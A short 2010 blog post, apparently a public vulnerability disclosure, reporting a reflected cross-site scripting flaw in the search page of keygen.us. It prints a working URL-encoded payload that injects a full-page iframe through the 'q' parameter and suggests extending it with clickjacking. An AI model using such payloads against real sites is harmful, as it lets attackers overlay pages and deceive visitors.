Archive for Keygen.us

KeyGen.us users: vulnerable to XSS attacks

Posted in XSS with tags , , on October 14, 2010 by Xacker

Keygen.us (porn free) is vulnerable to XSS attacks which might be applied on poor users

example:

http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width=”100%”%20height=”100%”%20style=”position:absolute;top:0;left:0″%20src=%22https://xacker.wordpress.com%22%20/%3E&w=cracks

w00ps!

isn’t that my blog ? 🙂

This is a simple demonstration, the attack vector might be extended through Clickjacking and/or Tabjacking techniques.

Update: here is a screenshot in case they fix it 🙂

Later.

Advertisements